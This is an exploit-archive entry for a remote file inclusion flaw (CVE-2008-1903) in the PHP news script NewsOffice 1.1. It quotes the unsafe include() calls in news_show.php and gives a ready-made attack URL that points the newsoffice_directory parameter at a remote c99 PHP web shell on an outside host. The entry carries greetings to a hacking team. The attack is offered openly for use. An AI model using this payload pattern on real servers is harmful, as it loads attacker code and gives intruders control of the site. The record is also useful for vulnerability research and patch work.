NewsOffice 1.1 - Remote File Inclusion

Author: RoMaNcYxHaCkEr
type: webapps
platform: php
port: 
date_added: 2008-04-10 
date_updated:  
verified: 1 
codes: OSVDB-44346;CVE-2008-1903 
tags: 
aliases:  
screenshot_url:  
application_url: 

-==========================================[ ViVa Islam + YeMeN ]====================================-

# Name : NewsOffice 1.1 Remote File Include Vulnerabilitiy

# Download From : http://www.newanz.com/applications/NewsOffice/?page=download

# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]  ( BlackxHat , BlackBox , aLwHEeD )

# Home Page :  WwW.4RxH.CoM

+======================================================================================================================+

# Vulne Code In File news_show.php In Different Lines :

include($newsoffice_directory."config.php");
include($newsoffice_directory."news_data.php");
include($newsoffice_directory."template.php");

# Exploit :

http://WwW.4RxH.CoM/NewsOffice/news_show.php?newsoffice_directory=http://rxh.freehostia.com/shells/c99in.txt?

Also The Version 1.0 Is Infected In Same File

That,s It,s

Good Luck Everybody

+=======================================================================================================================+

# Greet To :

Tryag TeaM & All Members Of My Forum

# For Contact : RxH@HoTMaiL.iT

# Fuck Own Life  :(

-==========================================[ ViVa Islam + YeMeN ]====================================-

# milw0rm.com [2008-04-11]